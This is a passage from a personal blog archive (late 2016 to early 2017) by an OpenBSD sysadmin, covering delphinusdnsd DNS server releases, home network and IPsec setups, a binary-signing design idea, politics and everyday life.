magic that runs computers. We also know from research that photonic circuits
can in theory do the same without the heat byproduct.
We also know that silicon can be doped to produce lasers. My suggestion is
to produce computers with photonic gates or fibre optic switches as components.
Put away with slow speed busses and combine RAM with CPU on one silicon
circuit. And interface this "package" with high speed optical paths to other
CPU's and I/O such as USB busses. There is very minimal soldering that needs
to be done in that scenario, but kids should learn to work with these high
tech components.
I am willing to bet a homebrew computer that uses light to switch it's I/O is
100 times faster than the usual 8 bit homebrews that we have. That's an
amazing 200 Mhz! We should teach our kids to build these from scratch giving
them the components only so that they can make their own.
I'm of the opinion that children from age 10 to age 14 should be taught how
to build their own computers and from age 14 through 18 use these tools to
expand their knowledge in other fields. Everyone their own computer! That
should be a must in the information age.
If you really think about this you may come to the conclusion as me that
people growing up around this idea will become craftsment from slaves and
will know how to build their own computers that are top notch technology.
Combined this is Open Source and Open Hardware and will tell the silicon
industry who possibly covet in secrecy to play fair. Their day has possibly
come.
Autumns Dress
October 18th, 2016
Got 4 Puffy Mugs today
October 18th, 2016
Delphinusdnsd name approaches 2 years old
October 20th, 2016
On November 14th, 2014 I forked delphinusdnsd from wildcarddnsd. It was a namechange to
indicate a new direction in programming, namely DNSSEC. I'd like to sum up
the milestones it got since then:
dd-convert.rb a ruby script to sign zonefiles
a semi decent working dnssec stack
Currently and this year I'm working on a replacement for dd-convert.rb to make
the project full C source again. And I'm getting ideas to incorporate parts of
dd-convert.c back into delphinusdnsd to help in things such as dynamic DNS that
is fully signed. But first I gotta get this done. It's my main task for this
year which had obstacles to overcome. I'm looking forward to 2017 to start
new things on delphinusdnsd and improve on it, here is some hints:
underlying database needs to be replaced, that means goodbye berkeley db.
The reason for this is that there is a bug with my implementation, not sure if
it's OpenBSD related or Berkeley DB related but it appears to affect queries.
And then there is always the need to refactor some code.
Will Internet Surveillance in Germany decelerate our Internet?
October 21st, 2016
Germany is already behind many other countries in Europe and elsewhere
(like South Korea), in terms of Internet speeds. Recently the BND
was given powers (german) to
surveill our Internet. I'm wondering if the surveillance will decelerate
our Internet from progressing into something fit for the 21st century.
South Korea is working on 10 Gbit/s speeds for everyone already. We're just
at 50 Mbit/s if we're lucky. I still have 16 Mbit/s. With every speed
upgrade at an ISP the BND will have to conform their spy equipment to similar
standards which is a burden on the taxpayer. I fear the pandoras box has been
opened.
Happy Hallowe'en!
October 31st, 2016
I got candies here! And awaiting children if any dare!
Shades can say so much!
October 31st, 2016
Made this photo a few days ago. I think it's very pretty.
Made with an iPod as I was walking down this path. Happy Autumn!
First day of Snow for the Season
November 8th, 2016
Yesterday I increased the heat to #2 on my electric "nachtspeicher" furnaces.
Tonight it's snowing. Stille Nacht.
Arctic Fibre aquired by Quintillion Networks
November 8th, 2016
Today is the first day of snow I experienced in 2016 fall season. In 2013 I
experienced the same first few days of snow in
Iqaluit, Nunavut.
Because I
saw a connection I researched the past and found in a link that Arctic Fibre
of Toronto, Canada was aquired by
Quintillion Networks last june. Quintillion Networks seems
to be run by people from Alaska. It reminded me how my friend in Iqaluit said
that Barrow, Alaska has a lot in common with Iqaluit (I think he said that on
twitter). Anyhow the Canadian part joining with the Alaskan part and stretching
to the UK is probably in limbo since it's been pushed back to Phase 3. But
here is hoping that Iqaluit will get terrestrial submersed fibre optic cable
some day.
Donald Trump is president of the US-elect
November 9th, 2016
I did not cheer for Hillary and I did not cheer for Trump. Americans failed
to look for the alternatives. My favourite was Jill Stein, who got very little
votes if any. I did not cheer for the "lesser evil" I turned my thoughts away
from the Clinton-Trump pair, even though people tried to tell me I had to
chose. I don't have to chose, I chose the alternative. Hopefully the Donald
will not wreck too much in relations between my country and the USA. I count
on the real alternative, the US Green Party.
Government (NASA) Space Program likely to suffer under Trump
November 9th, 2016
I talked a little about the American and European space programs in the past.
Now on one hand it was a GOP under Dubya Bush who wanted Moon to Mars. However
Trump has other priorities. He wants to fix the potholes in America first.
He makes economic sense, there is no glory when your infrastructure is
failing. But we likely won't see much action until at least 2021, that's after
his first term is my thought. With Obama the American Space Program suffered
but Obama set something in motion that was perhaps a smart move. The private
space industry, SpaceX, boeing, those sorts of private enterprises.
A real exciting Idea
November 10th, 2016
Yesterday I was brainstorming how to "sign" binaries in OpenBSD, and I caught
an itch. I don't know if I'll ever do this but I've given it thoughts since
yesterday. First though I want to show you this,
here.
I'm not the only person that thinks a signed binary in OpenBSD would be a good
idea. So then I thought about how to do this a little.
In the kernel the exec routines for reading an ELF binary would have to be
modified in the following way. It reads the ELF program header table and
expects a PT_OPENBSD_ELFSEC program header identification. By reading in
the entire binary upon exec, given that the user is not root (a suser check)
and caching shows no binary behing checked before (a walk of a LIST), the
kernel HMAC checksums the binary with a key that was ioctl'ed into the kernel
at boottime under securelevel 0, in fact this check is only done if the
securelevel is > 0. It then compares the section of PT_OPENBSD_ELFSEC
and it it matches it discards the read file, and lets read-on-demand take
over for the file. It is running a genuinely "signed" binary.
In userland there is 4 programs that get modified. Binutils, strip, elfsec
and elfsecd. When compiling new programs the PT_OPENBSD_ELFSEC program header
gets added to the ELF program headers. As root you can execute any signed
binary becasue then it doesn't matter if signed or not, a hacker has all
control over the system. When binaries are compiled make calls strip with
a new argument which will "bless" a binary with the elfsec program when root.
When a non-root user it is checked first if a user is allowed to bless
binaries and then elfsec speaks with elfsecd to bless a binary with the
private key that only root can read, a bunch of descriptor passing within the
imsg framework would work out nicely. The elfsec binary should also be able
to bless entire directories such as /bin, /sbin, /usr/bin, /usr/sbin etc.
This is the track I have wrapped my thoughts around. Dunno if it's worth it
but the installer program would need to be modified to rebless new binaries in
an upgrade. That would satisfy all those naysayers that say it would never
work. In the end result you prevent someone else from importing binaries that
you don't want runnning on your system. Perhaps a worm of sorts. It's
another level of security and it would cost an attacker a lot of resources to
crack the private key to each binary. It would slow down a system somewhat,
but I've been using SSD's for a few years now and don't see this as much of
an issue, also there is caching which should speed this up.
Hehe, thinking of vapourware can be mind consuming for sure :-).
OpenBSD Donation Time
November 19th, 2016
Part 2/2 of this year, I have donated 100 EUR to Theo de Raadt. This wraps
up my donations to all *BSD's this year. BTW the donation meter at
OpenBSD foundation
is almost filled to the goal. Congrats OpenBSD!
The Hydrogen Economy
November 23rd, 2016
My dad thinks this is a real good concept. The Hydrogen Economy. Unfortunately we're not there
yet, but rest be assured our militaries submarines have been using these for
quite a while. Maybe in another lifetime will we civilians make use of this.
My OpenBSD bridge inside Freifunk Franken
November 23rd, 2016
Freifunk Franken is a network that is partitioned into what's called hoods.
While the entire network consists of 10.50.0.0/16, my hood has 10.50.60.0/19
or something. I'm in the Hassberge Sued Hood which is centered around
Hassfurt. Each hood represents a Layer 2 (Datalink layer) network, so you
can reach within 1 IP Hop everything inside it. Since geographically my
parents house and my apartment are in the same Hood, I set up an OpenBSD
machine as a bastion host between my internal network and the freifunk franken
network to do IPSEC tunneling in order to have security and integrity between
my parents house and my house. The bastion host I set up at my parents house
looks like this:
It is a PC-ENGINES APU router that does not have forwarding between its
interface, hence there is no way to misroute things.
I've been running this for a few weeks now and have hooked up SIP phones to
this. The phone conversations are clear as ever (38 ms ping). Knowing that
they are encrypted is a big bonus.
Blueberries
November 29th, 2016
At my local supermarket I picked up a batch of blueberries. When I ate them
I noticed a change in vision and a hightened awareness. This made me
curious what I experienced. For one it enacted in my visual senses, so that
must be the occipital lobe area of the brain. Reading online about this
fruit I found that it is classed a "superfood", a nutrition bomb so to speak.
It is high in Vitamin C and K and has manganese. It is good to have when
you have nutritional deficiencies. It sure made a diff for me this afternoon.
Also its latin name of its genus: vaccinium sounds like the english vaccine.
Maybe there is a relation. I'm glad I experimented with this.
Our Mass-surveilance problem
December 1st, 2016
I just watched Edward Snowden on a clip on youtube during dinner and he made
a great speech regarding that presidents can't fix the mass surveilance problem
and that we must fix it (as a world movement). He said we must weigh the
should we and shouldn't we or something, because lately it's been the can or
can't we. This reminded me that the german BND (spy service) has been given
150 million EUR to spy on people's snapchat and other encrypted forms of
communication. We have to work against the powerstructures that want to take
our privacy and route around these.
BTW there is fake news possibly saying that Julian Assange has been kidnapped
by CIA. Fake news can be so annoying because they could turn out to be real.
Julian, I hope you're OK!
2016 Year in Review
December 8th, 2016
A bit earlier than most years here is the review for 2016.
December 8th, 2016 This year in review 2016.
December 1st, 2016 Our Mass-surveilance problem
November 29th, 2016 Blueberries
November 23rd, 2016 My OpenBSD bridge inside Freifunk Franken
November 23rd, 2016 The Hydrogen Economy
November 19th, 2016 OpenBSD Donation Time
November 10th, 2016 A real exciting Idea
November 9th, 2016 Government (NASA) Space Program likely to suffer under..
November 9th, 2016 Donald Trump is president of the US-elect
November 8th, 2016 Arctic Fibre aquired by Quintillion Networks
November 8th, 2016 First day of Snow for the Season
October 31st, 2016 Shades can say so much!
October 31st, 2016 Happy Hallowe'en!
October 21st, 2016 Will Internet Surveillance in Germany decelerate our..
October 20th, 2016 Delphinusdnsd name approaches 2 years old
October 18th, 2016 Got 4 Puffy Mugs today
October 18th, 2016 Autumns Dress
October 16th, 2016 An idea and a plea for our worlds society
October 13th, 2016 Ordered 4 Puffy Mugs
October 13th, 2016 Upgraded io.solarscale.de to OpenBSD 6.0
October 11th, 2016 My core network
October 8th, 2016 Usutu Virus killing Blackbirds
October 6th, 2016 Good News
October 4th, 2016 I got credited to a bug report
October 4th, 2016 I've turned on the heat for 2016/2017
September 30th, 2016 FreeBSD Donation
September 30th, 2016 Victim of spoofed Mail
September 27th, 2016 My IPv6 setup at M-net (german provider)
September 20th, 2016 Ordered a book from Amazon
September 20th, 2016 Equinox in two days
September 14th, 2016 Stand up for Snowden
September 14th, 2016 TLS for centroid.eu blog, when?
September 9th, 2016 One more panic chronicle entry
August 30th, 2016 I had photographed Vega and Constellation Hercules
August 30th, 2016 The whereabouts of HD164595 in Hercules
August 24th, 2016 OpenBSD 6.0 Poster arrived
August 22nd, 2016 Ordered a Banana Pi R1 Routerboard and Case
August 22nd, 2016 Delphinusdnsd: Next week selfathon
August 19th, 2016 Eleven Reasons to be excited about the future of Tech..
August 19th, 2016 The Panic Chronicles
August 16th, 2016 My all-prime angled triangles
August 15th, 2016 less surveilance
August 9th, 2016 New self-portrait of me
August 5th, 2016 Psychosis: put to the test (my first psychosis)
August 5th, 2016 DSL: a question I've always wondered
August 5th, 2016 O Really? Do we really need NATO?
August 5th, 2016 Ordered 4 books
August 2nd, 2016 If I were to vote in the US Election today
July 30th, 2016 Freifunk Project fail
July 24th, 2016 Did you know: DoS report law
July 23rd, 2016 Finally quit Twitter
July 23rd, 2016 Media blackout of SZ.de yesterday
July 22nd, 2016 Quitting Twitter tomorrow at noon
July 22nd, 2016 The WTC conspiracy
July 19th, 2016 Sick of it
July 18th, 2016 My Stargate
July 15th, 2016 Ordered two books
July 13th, 2016 It's not me
July 5th, 2016 EU could be un-democratic
July 4th, 2016 Being Freifunk Active
July 2nd, 2016 The missing link
June 29th, 2016 Changs at $HOME
June 26th, 2016 Ordered books from Amazon
June 25th, 2016 I hunt sysadmins
June 25th, 2016 EU, somethign must change
June 24th, 2016 Idea Brainstorming for Britain
June 24th, 2016 Goodbye Britannia
June 21st, 2016 Happy Summer!
June 20th, 2016 June Solstice in 3 days
June 18th, 2016 Received seven Freifunk Routers
June 12th, 2016 Most cannot see the milky way
June 10th, 2016 Energiewende in Danger
June 10th, 2016 Why I prefer BIND over unbound currently
June 4th, 2016 OpenBSD Donation Time
June 4th, 2016 Brexit, I'd like UK to stay
June 4th, 2016 Gotthard Base Tunnel
May 26th, 2016 Moved delphinusdnsd
May 21st, 2016 Turkeys government? No go!
May 20th, 2016 Instead of Toronto, Ireland?
May 16th, 2016 5 days left for americas.centroid.eu
May 15th, 2016 Ordered books
May 12th, 2016 Donated $5 to ISC
May 12th, 2016 The need for a mesh network
May 12th, 2016 Stoererhaftung has been eliminated in Germany
May 10th, 2016 Europeans love English!
May 7th, 2016 One router too many? The add-up.
May 7th, 2016 RPI Guest AP done, but not for 2.4 GHz
May 5th, 2016 Not passing down my RPI after all
May 3rd, 2016 My dreamworld
May 2nd, 2016 Blog's birthday
May 2nd, 2016 Considering an SSD upgrade
May 1st, 2016 13,500 positions in the German Cyber Army
April 22nd, 2016 Doing a training session this summer
April 15th, 2016 Stand down! OK.
April 13th, 2016 12 months of Parship
April 7th, 2016 VDSL not until February 2017
April 7th, 2016 Registered a new domain
March 30th, 2016 I waited 3 years for this moment
March 28th, 2016 Ordered 100 Mbit Internet
March 27th, 2016 A rare word on politics
March 27th, 2016 Handing down my Raspberry Pi model B
March 27th, 2016 Very cool presentation by Agarwal
March 21st, 2016 Spring now...
March 19th, 2016 Making a turn-key dns server out of DelphinusDNSD
March 14th, 2016 Lordy Lordy loook who is Forty
March 6th, 2016 30 Years of Personal Computing History
March 6th, 2016 After 16 years, I got a TV
March 3rd, 2016 Ordered a backup Firewall
March 1st, 2016 New VDSL modem turned on
March 1st, 2016 19 days until March Equinox
February 24th, 2016 New Access Point in my apartment
February 24th, 2016 Venus broke
February 23rd, 2016 Registered domain zeropager.de
February 20th, 2016 Getting a TV after 16 years having none
February 18th, 2016 Apple is right (in this case)
February 12th, 2016 DSL Link issues, Provider refuses to help me...
February 8th, 2016 Delphinusdnsd waht's next in development?
February 3rd, 2016 Ten days from now is Year Three
February 3rd, 2016 Electricity for 2015 way up
January 29th, 2016 Delphinusdnsd 1.0.1 released
January 23rd, 2016 All Domain Names signed
January 22nd, 2016 Delphinusdnsd - ironing out the DNSSEC bugs
January 21st, 2016 What's up down with the Canadian Dollar?
January 20th, 2016 Preparing to sign my zones -> DNSSEC
January 19th, 2016 To Human Artificial Systems
January 9th, 2016 Dissecting WebShoppy Mac OS X trojan
January 8th, 2016 Organized Crime is the Enemy
January 6th, 2016 Donation time
January 3rd, 2016 The invisible man
January 1st, 2016 How hard can changing a password be?
January 1st, 2016 When a book loses significance
January 1st, 2016 Delphinusdnsd 1.0.0 Released
December 31st, 2015 More power from Arabia and Sahara?
December 29th, 2015 Our XMAS Dinner
Enjoy the memories.
Solstice in three days
December 18th, 2016
The solstice will be here in three days. Happy solstice!
Merry Christmas
December 24th, 2016
May Santa be good to you.
Christmas Tree 2016
December 24th, 2016
Not really a tree, but this is how we've done it for the past decade or so.
Merry Christmas!
Hacking days
December 27th, 2016
I'm on vacation. I've decided to use most of my vacation days to hack on
delphinusdnsd. If you're interested in progress I'd suppose you could look
at this link. Thanks for well-wishes!
Happy New Year 2017
December 31st, 2016
As I write this, it's already been new years in Fiji, so the Earth is
rotating in 2017 already. I had a very good year in 2016, and hoping
2017 will be good too. I wish the same for you.
Delphinusdnsd will be released January 29th
January 2nd, 2017
There is new news on
the delphinusdnsd website. To quote:
"DelphinusDNSD 1.1.0 is in alpha-testing, the release date is fixed to
around January 29, 2017. Contact me if you want to help. The changes are
far from staggering, they are more about programmer freedom. I have replaced
the Ruby program with a C program and rely less on an external program
provided by BIND. So I escape licensing caveats and am in a much better
position. Due to my limited time (so far a 1 person effort), I did not get
TODO's in that I really want to see in, maybe for the 1.2.0 release, which
would be in 2018 :-}."
I still invested a lot of time in this in 2016. But my resources are limited.
Any (open source) programmer will tell you this.. (time is not enough). But
I guess it happens everywhere.
Goodbye Mac OS X port
January 3rd, 2017
I have decided to drop the Mac OS X port for delphinusdnsd. If anyone wants
to pick this up all it really needs is a Makefile update. The reason I do
this is because Mac OS X is a dying OS at my house. I only have 1 native
Mac OS X computer left and I don't want to pollute it with Mac Ports. Also
I'm against running delphinusdnsd on a computer that has an open microphone
for Siri. Let the real operating systems survive.
BIND didn't reply with AD flag
January 5th, 2017
I made a configuration mistake in my BIND options. I had set dnssec-validation yes; but this was wrong, this is how it should look like:
Only with the auto set will the AD flag appear and validation is being done.
Thanks google for helping me find the problem.
RFC 8020 violation of Delphinusdnsd
January 8th, 2017
When delphinusdnsd has a zone.tld domain name and that contains a _25._tcp.mail.zone.tld domain name then when someone looks up just _tcp.mail.zone.tld
the daemon replies with an NXDOMAIN. This is wrong. It should reply with
NODATA which is NOERROR with nothing in the data section. Needless to say
I'm going to try to fix this before the 1.1.0 release.
Obama, why not pardon Chelsea Manning?
January 8th, 2017
Chelsea Manning is still imprisoned. Why doesn't President Obama pardon her?
There is one week left to do that. Act now!
After fixing NODATA of ENT names...DNSSEC breakage
January 10th, 2017
My DNS server delphinusdnsd is currently broken in NOERROR reply when dealing
with ENT (empty non-terminal) names in DNSSEC. I'm working on the issue after
having tested ENT additions, and hope to finish by the 28th of January. If
not then the 1.1.0 release will have to be postponed. These ENT fixes as
explained in RFC 8020 are an absolute must for a DNS server and I have to
fix it.
Short Weekend
January 16th, 2017
A harddrive died at work and re-ordered my weekend in such a way that I did
not sleep at my parents which I usually do. I had to get up at 5:35AM this
morning to assist the remote hands to swap the failed drive. Ahhh. The life
of a sysadmin, when shit breaks. And shit will break. It's just a matter
of time.
Blog outtage
January 18th, 2017
This blog was down for 24 hours because of the power outtage in Amsterdam
yesterday. Even though my VPS came back yesterday I forgot to check the
PHP scripts and just noticed it was down. Sorry for the inconvenience.
I have taken steps to make sure that php55_fpm gets started right after
reboot. It was a badly named rc script.
Thank you President Obama! Chelsea will be released May 17th
January 18th, 2017
Chelsea Manning has all the reason to celebrate today because her days in
prison are numbered. Before her sex change she was named Bradley. I have
dug up this photo of her from an article from September 3rd, 2011.
If you don't know what Chelsey did it was like this. In the war in Iraq a
family of children and women and a man were shot up by a helicopter gunship.
It was gruesome to watch, and it was Chelsea that released the video to the
public. Chelsea sat in prison for someone else (the pilot), is my take on it.
Anyhow leaking such material from the military is not undangerous, as you can
see Chelsea sat 6+ years in prison. She tried to commit suicide and did a
hunger strike. All that will be past soon but the scars remain and will need
healing.
After 8 years presidency Obama becomes ex-president
January 19th, 2017
What did president Obama mean to me? He was the first black US president many
said but he had a white mother so that makes him half-white. I realise he had
no luck with the senate which was mostly republicans and there was a time when
I thought that many decisions done by the senate were racist in contrast to
president Obama's vision.
One thing which he did not achieve was closing Guantanamo Bay (gitmo). I'm not
sure if he tried hard enough on that, or if he was ignored by the military.
I used to dream of US presidents a lot because of their exposure in the news.
The last dream I had of Obama was during the Ukraine crisis so in 2015.
President Obama closed the US Army Garrison in Schweinfurt, Germany where I
live. There was 2 bases here and in hindsight it was a good thing that the
military moved out. We are a strictly civilian town now. And the bases were
reused to house refugees during and after the 2015 migrant crisis. When I
told someone on a train in Canada who was US citizen that our bases were going
to be closed, the response was "why are they doing that?!" that was in 2013.
When I replied "Obama", he said "makes sense". I think I was taken out of
context though, I have nothing against Obama at all. Compare him with all
the previous presidents dating to Reagan, he was probably the best of them all.
Now in terms of globalisation I feel that Obama was a little reserved, he
tended to want to isolate the US. His successor is a real isolationist so
Obama was hardly isolationist compared to what we think Trump is. I'm glad
president Obama pardoned Manning. Too bad he didn't intervene earlier. But
he is a president that tries to go by the rules as much as possible. In this
case he could have bent the rules more, noone would have objected. All in all
I think Barack Obama served the American population well, from an outsider's
viewpoint. I will miss him.
Electricity for 2016
January 19th, 2017
I come through with reduced energy, even though I pay more this year. This is
because the costs per KWh went up.
Year
Night
Day
Total
2013
6941
1276
8217
2014
6906
1323
8229
2015
10151
1452
11603
2016
9643
1420
11063
The apartment was mostly heated and not once did I freeze that I can remember.
But it would be nice if the 2014 Night values came back :-).
Fan of flying machines
January 19th, 2017
When it's day I look out my window a lot. I enjoy watching the pigeons do
their formation flying. And sometimes... I get this:
If you enlarge the image you may see more. It is three Apache gunships and
one Chinook (so I call them) that is a troop transporter for 25 or more fully
equipped troops. Anyhow these make a hell of a noise when they come around
so I was able to snatch a few pictures.
Delphinusdnsd will be released in roughly 4 days
January 23rd, 2017
I'm putting the last few changes in to make this software ready to be tagged
and put up for download. If you'd like to beta test you have roughly 4 days
to grab a snapshot and try it out. So far I've tested this on Ubuntu, Rasbian,
OpenBSD, NetBSD, FreeBSD and OpenSuse, and it seems to work. The new release
will be version 1.1.0.
First mesh in Schweinfurt/Deutschhof
January 25th, 2017
Schweinfurt got the first mesh between two non-associated parties (me and the
bakery Höreder Beck). As you can see on the yellow link that there is
a medium quality link there. However the link does disappear a lot due to
interference. I'm hoping on putting up a relay which is coloured red across
the parking lot, which shortens the distance to both endpoints. Hurrah
Freifunk!
Delphinusdnsd 1.1.0 released
January 28th, 2017
Finally I tagged the tree and made a tarball. The news at
delphinusdns.centroid.eu
say the following:
DelphinusDNSD 1.1.0 has been released on January 28, 2017. New is a
dd-convert.c C program that replaces the ruby tool with the same name.
Also I have fixed Empty Non-Terminal (ENT) Names in this release, meaning
earlier version likely give wrong answers on the Internet. You can get
the source under the "Source" link. Mac OS X port has been dropped.
I'm glad this last years efforts were finished in time. Now I'm gonna rest it
a little and figure out where in what area I have to put my efforts next.
Switching Internet Providers
February 9th, 2017
Today I got a package in the mail. It was from Telekom.de. They sent me
a new set-top box for my TV. Also they sent me login credentials to their
network. On Monday next week my modem will likely go offline either before I'm
home or just after, and I'm going to put my new VDSL modem to use. I upgraded
the OS on my routers gamma and venus, so that they won't be panic'ing on
igmpproxy which is needed for the Telekom IPTV. I got everything prepared.
Monday is the big showdown though. I'm very excited as I'm going from 16/1 to
100/40 and I was hurting on the upload at nights. Better soon come!
Updated Network Map
February 9th, 2017
I have updated the Network map on how my network will look like after monday:
New is that I drilled a hole through a wall for a cat5 link between access
point and venus. I have also laid conduit for 2x 10 meter cabling for the TV
and the IPTV set-top box. One thing that is funny is when I'm connected from
beta to supercluster which is on the Internet, and I reboot venus, then the
connection will drop between supercluster and beta. I haven't figured out
why yet though. There is an IPSEC tunnel going from beta via uranus via gamma
to mercury, that IPSEC's the part going over wireless. It too doesn't touch
venus, so mega weird.
Munich show a little more respect to Linux
February 10th, 2017
Linux for the city of Munich was innovative and popular. Now the CSU and SPD
municipal government wants to turn back the clock and go with Microsoft
products again. They forgot the lock-in they were in before. All over
Germany people said "you should go to Munich" if you had anything to do with
Linux. Such a movement should be rewarded not punished by tearing it down.
They say that Microsoft is the standard. Well, to be honest I haven't used
Microsoft products for over 20 years. I often can't find work when I'm
looking for new work, perhaps because I didn't buy into the Microsoft hegemony.
Those that use alternatives should be rewarded for being different in my
opinion. If you saw the business opportunities the alternatives can create
you'd want the alternative too. Microsoft is a dead-end. Anyhow shame on the
munich municipal government for their wrong decision.
I switched Internet Providers
February 14th, 2017
M-net was my old provider. They changed around 5 years ago and didn't give out
goodies such as static IP's. That peed me off enought that I decided to switch
the competition has all the stuff they have by now and more! I get VDSL2 now
and get 100/40 speeds (more like 102/38 but meh). All in all I'm happy with
this move. Unfortunately the new IPTV won't work on my network, I'm hoping to
be able to give it back to the ISP and get a discount for just IP and SIP
phone service. I still have to connect my SIP account but that shouldn't be
so hard.
Why I won't be renewing my Parship.de membership
February 17th, 2017
Parship.de is a matching/dating service. After one year and 500 EUR or so, I
do not think I got the best service in the country. In fact I feel parship
got a free ride off my money. Like I told my mom I'd have a better deal with
a hooker for that money than get to look at the blurred out pictures of parship.
Unlucky for me I don't really believe in hookers. So I had one person who I
even talked to in messages there, noone else was interested in me. And she was
an 80 out of a possible 117 points, so rather a bad match. They base these
points on some psychological profile and try to match strengths with weaknesses.
She stopped talking to me just before christmas right after I told her I had
visual hallucinations before, I'm quite honest about my mental illness.
Hiding from myself rests on my conscience and I can't go through with it.
I like to be as honest as possible. In this case the person I talked with
wasn't interested in psychos. How boring.
So I won't be renewing and I have
already cancelled. Also I have noticed whenever they tried to match me with
someone else the other party was fat like me. Just an observance.. mix all
the psychos with the psychos, the fat ones with the fat ones and the coloured
with the coloured ones is the impression I got from that. In the end the
skinny, white and truely pretty people can continue their games of cheating,
lying and using others. Go ahead.. not my game! I can't lie I'm attracted
to normal sized women as much as anyone else. I'd date a fat one too
but I feel the algorithm chose them for me because they were fat, and I'm
sorta sick of that. In many cases, like in mine, being fat is not our fault
but a side-reaction to medication used.
Also I sorta missed the bus. If I meet someone and we possibly marry and have
kids... what worries me is that at older age there is higher chance of downs
syndrom for the babies, so I looked for women mostly 8-10 years younger than
me. And it felt weird because these women were just getting their lives going
and I felt I wasn't on their wavelength. It just didn't work out. I'm glad
for all those couples that met online through a matchmaker, but for me it
wasn't great. I dunno I don't think I'll ever marry or have children anyhow.
And getting into a relationship with someone who has kids...well that's too
hard for me to follow through with. I don't want to use them because they're
desperate finding a partner that can raise their kids, and it's too much of a
burden for me as well. I'm a big baby myself and needn't be an extra chore
for someone with a lot of chores. So meh. Forever doomed?
Jobless despite Certification
February 21st, 2017
Golem.de (a news portal I read) reports that
a 36 year old IT pro with system admin certifications and 10 years experience
can't find work. Hear, hear! I believe it as I'm unofficially looking as
well. Problem is that the golem article talks about 3000 such sysadmins also
can't find work. It makes you wonder what is going on here?
We get Linux certified and can't use our
skills? There is 50,000 job postings for IT jobs, why do 3000 people have to
be out of work? The industry has not adjusted to what people are being trained
on. Give us Linux jobs! Give us UN*X jobs! Also I would like to have the
government probe into workplaces that are just faking job postings. To gain
information for statistical purposes and advertising. If that is the case
it should be highly illegal.
ZeroPager.de domain about to expire
February 21st, 2017
I registered this one either last year or the year before as a test domain.
It served its function well. I'm letting it expire.
Networking Plans for future Computers in my Home
February 24th, 2017
I'm hoping to replace everything (everything!) in my house with 10 gbit
Ethernet equipment by/at the year 2020. For those equipments with many
ports I have planned to get a high-end NUC or so and a switch that does
VLAN'ing. My personal preferences for such a switch is 8+ ports and 22 watts
power consumption or so. I've seen some switches that do 40 watts and that's
too much for me. The cables will have to get upgraded too as they are cat5e
standard, and I believe 10gigE requires cat 6 or 7. At least the countup of
all of this is gonna be easy. These are my dreams for 2020 anyhow. There
is 3 years to go, and I know I'll get cravings to get new equipment in between
that. I hope I can stay disciplined enough.
Four years in this ol' place
February 24th, 2017
I forgot to say...I am now four years in this apartment. Time has really flown. It's almost
as long as my last apartment, which was a long time. I'm hoping on staying in
this apartment beyond 2020. Unless I get other opportunities.
My first SIP ALG program
February 26th, 2017
ALG is a VOIP term and means Application Layer Gateway. I have created in the
last week a SIP ALG program that I call rtptrack. It makes sure that outbound
(inbound untested) calls work on the t-online.de network. The router I use
is OpenBSD with the pf filtering system (which is supreme!).
The reason that t-online.de did not work with its existing setup was that they
don't utilize an "rtphelper" algorithm which helps RTP punch a hole into a
firewall. Sipgate.de and the VOIP company I work for do this and their setup
just works (tm). RTPtrack should make Telekom work too. Finally something
there works!
It's too bad what I'm about to say. But computers of today are not secure
enough for todays election (!!!). A white hat hacker in the Netherlands
agrees and has facts why. His story is at soylentnews.org. Computers these days are a
joke and I'll give you another example. I bought a computer in 1997. It was
the cheapest of its kind for $850, and they really skimped on the parts. That
same computer would be worth $1,240 today with inflation. But we can buy PC's
for $300 so they really got a lot cheaper and/or skimped on the parts (and
polluted rivers in China). We know they skimp on the parts because computers
have not become inherently safer. In fact they are faster but brain damaged.
So it's to no surprise that security software often slow computers down.
(Why is that?!) It's because security requires processing in order to make
smart decisions! I'll give you one example. The ISN of a TCP session in
OpenBSD uses the cryptographic routine called arc4random(). Do your homework
why this is important (see /usr/src/sys/netinet/tcp_subr.c - function
tcp_set_iss_tsm(), an RFC 1948 is quoted in the comments). So while computers
have gotten 4 times as cheap over 20 years, they haven't changed in design.
This is too bad, this must change! In fact I'd expect a computer to cost
more than $1,240 if it were anything more than crap!
When I fell into the EU's lap, or, what's wrong with you?
March 5th, 2017
When I left West Germany as a child to live in Canada for a decade and a half,
I left not knowing about the EU. I retained a german passport however and
returned to now-united Germany in 2002. In fact in 2002 I don't remember
using the DM anymore and it was the Euro. The EU was big in population.
Real big. Bigger than the USA, and I had to get to terms with that, that
I'm now living in a 500 lbs Gorilla superstate.
Sooner or later I began to like what the EU allowed me to do. I took on
trips to France and the Netherlands in the next decade, without needing to
go to customs or money exchanges, and it was a great feeling. It was like
something directed me into place that I was a European now and not just a
German citizen.
I also considered taking a train to London via the Channel Tunnel right from
home and considered the route on bahn.de. Unfortunately with Brexit I'll have
to delay that London trip a little bit. I don't feel comfortable with customs
at all. We should live in a borderless world. Really! And we should become
world citizens. But it will have to be European as a first step.
Don't get me wrong. I too have had my share of hard times being unemployed
for 7 years at a length, in Europe. It may seem sometimes that Europe is not
able to compete with itself for jobs. But at the same time we're getting
richer as a community so the money goes somewhere. I'd say look not at
globalization as the culprit but the un-equal structures that evolved before
states united into the EU.
We have to make the EU great. And not again. Because we were never great.
We're in our infancy and the six founding members of the EU, of which Germany
(West) is a part of, needn't try to break up this once in a lifetime
opportunity. We are the core, we should set the examples for the rest of the
EU.
In the past I have seen an unseen hand of the Internet try to downgrade the
EU. Try to sever our bonds from far. With me that doesn't work however I
see much to be desired for when it comes to the number of crisis situtations
that we have to endure. I'd like to see us become closer tied in the future.
That means not just internal affaires being handled in the EU but also that
we have an arm of external affaires and handle those. Only then can the EU
defend itself.
Germany is having an election year this year and I do intend to vote for a
pro-EU and pro-solidarity party. Have a nice day.
The car I intend to buy
March 5th, 2017
I've not had a car since 1993, so close to 25 years. Back then I had a 1987
Dodge Shadow (turbo). And after moving to a metropolitan area of 4 million or
so inhabitants (rough estimate), I preferred taking the subway, bus, or even
go about by bicycle. Since I've been working at a job in the VOIP industry for
close to 7 years now, I've saved up my money. And I'm finally wanting to
spend that money again. First I wanted to invest it into a business, but that
is harder than you think. I'd rather get a car now and i've set my eyes on an
electric car. Particularily the
Renault Zoe. I've fallen in love with that little car, even though I
haven't driven it yet. Should be interesting taking my first ride in it.
With the car I'm going to get a few other gadgets. For example a cell phone.
Yep I haven't had a cellphone for close to 15 years now. I'll need it to
call emergency services when my car has problems. Also I do want to persue
astronomy more and perhaps get a Newton or such scope. With a car I can put
it all in the trunk and drive to locations where it's dark enough. I don't
know what it is but it seems I've been granted a new stage in life from a very
skimpish lifestyle to being normal. I'm just soaking it in, and spending the
money I aquired over the years. Should be good.
New VPS
March 7th, 2017
